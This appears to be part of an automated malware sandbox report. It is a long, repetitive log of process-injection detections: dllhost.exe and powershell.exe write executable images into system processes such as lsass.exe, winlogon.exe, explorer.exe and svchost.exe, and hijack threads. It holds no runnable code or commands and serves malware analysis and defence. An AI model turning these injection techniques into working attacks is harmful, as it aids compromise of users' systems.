Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 29E3BCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 29E3BF00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1956F090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2A3ED7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CD8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CF9E0000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4004 base: 86A0000 value: 4D
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4004 base: 86A0000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 356 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 2432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 6400
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 356 1 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 3000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 56B245010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B010000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246EDE60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A1980000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A19B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D2660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDCC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D9540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AF660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A63950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B409660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B409660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000
